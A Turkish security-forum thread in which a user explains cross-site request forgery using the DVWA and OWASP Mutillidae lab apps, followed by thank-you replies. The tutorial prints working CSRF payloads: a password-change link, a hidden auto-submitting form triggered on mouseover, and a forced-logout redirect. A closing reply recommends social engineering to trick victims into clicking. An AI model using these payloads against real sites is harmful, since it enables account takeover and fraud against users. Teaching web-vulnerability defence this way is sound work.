TARİHTE BUGÜN

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly

Ex0nly - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2020
Mesajlar:
19
Konular:
8
Teşekkür (Etti):
2
Teşekkür (Aldı):
7
Ticaret:
(0) %
3 Hafta önce
#1
Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
Cross Site Request Forgery (CSRF) zafiyeti, belirli işlemlerin gerçekleştirme şeklinin kurban yetkisi ile saldırgan tarafından hazırlanan zararlı kodlar ile gerçekleştirilmesidir. Bu zafiyet aslında kurbanın etkileşimi ile gerçekleşir.

Aşağıda parola değiştirme işleminin gerçekleştirildiği form görülüyor.



Bu form ile şifremizi değiştirelim ve gönderilen parametrelerin hangi metot ile ve URL alanındaki halini görelim.



Yukarıdaki resimde url alanında gönderilen yeni parola değerleri açık halde gönderiliyor.Bunu aşağıdaki resimde de burp suite aracılığıyla görebiliriz.



Görüldüğü gibi parola değiştirme işlemini asıl gerçekleştiren URL değeri aşağıdaki gibidir:

Kod:
dvwa/vulnerabilities/csrf/?password_new=password&password_conf=passwor d&Change=Change#
Şimdi saldırgan olarak düşünelim. Kurbanın login işlemini gerçekleştirdiğini düşünelim ve site içerisinde başka işlemleri gerçekleştiriyor. Kurbanın dağınıklığından veya hazırladığımız zararlı kodun normal bir değermiş gibi algılanmasından faydalanarak kurbana bunu link haline getirdiğimiz bir resim,reklam objesini tıklatarak veya mail atarak gerçekleştirsek ve parola değerini bizim istediğimiz parola ile değiştirsek nasıl olur.



Resmin kaynak koduna baktığınızda şunu göreceksiniz:

Kod:
<a href=”http://fbhportal.com/dvwa/vulnerabilities/csrf/?password_new=hacker&password_co nf=hacker&Change=Change#”>
Halbuki yaptığınız tek şey reklama tıklamaktı.Tıklama ile beraber parolanız hacker olarak değiştirilecek.Bunun birde bankacılık işlemlerini gerçekleştirirken başınıza geldiğini ve hesabınızdan para çekildiğini düşünün.

Web uygulamalarında yorum alanlarını çok dikkatli kullandırtmak gerekiyor.Bu alanların girdileri ve çıktıları kontrol edilmeden işlem yaptırılırsa tehlikeli saldırılara maruz kalınabilinir.Bunun tipik örnekleri bu yorum alanlarının html destekli olarak kullanıcılara sunulmalarıdır. Html destekli alanlara CSRF-XSS saldırıları çok rahat gerçekleştirilir.

Bir kaç farklı CSRF saldırısını ele alalım.

Bu uygulamayı OWASP-Mutillidae uygulaması üzerinden gerçekleştireceğiz.

Zararlı Kodlar:

Kod:
<form id="f" action="index.php?page=add-to-your-blog.php" method="post" enctype="application/x-www-form-urlencoded">           <input type="hidden" name="csrf-token" value="best-guess"/>           <input type="hidden" name="blog_entry" value="Add this guy to the Wall of Sheep"/>           <input type="hidden" name="add-to-your-blog-php-submitbutton" value="TESTING"/> </form> <i onmouseover="window.********.getElementById(\'f\').submit()">Dancing with the stars results </i>
Bu kodları uygulamada test edelim.



ikinci uygulamamızda yine mouseover( ) olayının tetiklenmesi durumunda session-oturum düşmesi gerçekleşir.

Zararlı Kod:

Kod:
<i onmouseover="window.********.********=\'http://localhost/mutillidae/in dex.php?do=logout\'"> How to improve your Facebook status </i>


Üçüncü uygulamada javascript kodu ile satır eklenir sayfa yenilenir,sayfa yenilendiği sürece satır eklenir. Bu da bir nevi DOS saldırısı gibi sayfanın kullanılamaz hale getirilmesini sağlar.



Görüldüğü gibi yorum alanlarından alınan yorumlar neticesinde ciddi açıklıklar oluştu.Bu nedenle yorum alanlarının girdileri ve çıktıları mutlaka kontrol edilmelidir.

CSRF,Owasp top 10 listesinde hala yerini koyuyor.
"P4RS, By Ghost Teşekkür etti.
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2017
Mesajlar:
3.050
Konular:
90
Teşekkür (Etti):
210
Teşekkür (Aldı):
977
Ticaret:
(0) %
3 Hafta önce
#2
Cevap: Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
Emeğine sağlık, Güzel Konu.
--------------------- ‘’ Ve Orhan Veli Ceketsiz Öldü.’’

Ex0nly - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2020
Mesajlar:
19
Konular:
8
Teşekkür (Etti):
2
Teşekkür (Aldı):
7
Ticaret:
(0) %
3 Hafta önce
#3
Cevap: Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
Teşekkür ederim.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.357
Konular:
449
Teşekkür (Etti):
953
Teşekkür (Aldı):
1973
Ticaret:
(0) %
3 Hafta önce
#4
Cevap: Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
Ellerine sağlık dostum
---------------------

Twitter Telegram

"Kalk haydi, ebediyen uyuyacağız zaten"
Ex0nly - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2020
Mesajlar:
19
Konular:
8
Teşekkür (Etti):
2
Teşekkür (Aldı):
7
Ticaret:
(0) %
3 Hafta önce
#5
Cevap: Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık dostum
Teşekkür ederim.
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
23
Mesajlar:
956
Konular:
143
Teşekkür (Etti):
396
Teşekkür (Aldı):
405
Ticaret:
(0) %
3 Hafta önce
#6
Cevap: Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
Çok güzel hazırlamışsın detaylı da anlatmışsın ellerine sağlık
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Ex0nly - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2020
Mesajlar:
19
Konular:
8
Teşekkür (Etti):
2
Teşekkür (Aldı):
7
Ticaret:
(0) %
3 Hafta önce
#7
Cevap: Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
Alıntı:
By Ghost´isimli üyeden Alıntı Mesajı göster
Çok güzel hazırlamışsın detaylı da anlatmışsın ellerine sağlık
Teşekkür ederim
axmetmcl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Mesajlar:
418
Konular:
9
Teşekkür (Etti):
68
Teşekkür (Aldı):
75
Ticaret:
(0) %
3 Hafta önce
#8
Cevap: Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
eline sağlık oldukça yalın düzeyde bir anlatım olmuş. bu açık çoğu sitede bulunabilir ancak gerçekleştirmek zordur çünkü kurbanla iletişim halinde olmanız gerekir.
Ex0nly - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2020
Mesajlar:
19
Konular:
8
Teşekkür (Etti):
2
Teşekkür (Aldı):
7
Ticaret:
(0) %
3 Hafta önce
#9
Cevap: Cross Site Request Forgery (CSRF) Web Zafiyeti/Ex0nly
Alıntı:
axmetmcl´isimli üyeden Alıntı Mesajı göster
eline sağlık oldukça yalın düzeyde bir anlatım olmuş. bu açık çoğu sitede bulunabilir ancak gerçekleştirmek zordur çünkü kurbanla iletişim halinde olmanız gerekir.
Öncelikle teşekkür ederim.Evet kurbanla iletişim halinde olmak gerekir, fakat sosyal mühendislik yöntemleri ile çok kolay bir şekilde linki kurbana yedirebilirsiniz.Bir şey yazmak zorunda bile değilsiniz, linki kurbana atsanız adam zaten meraktan tıklar.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler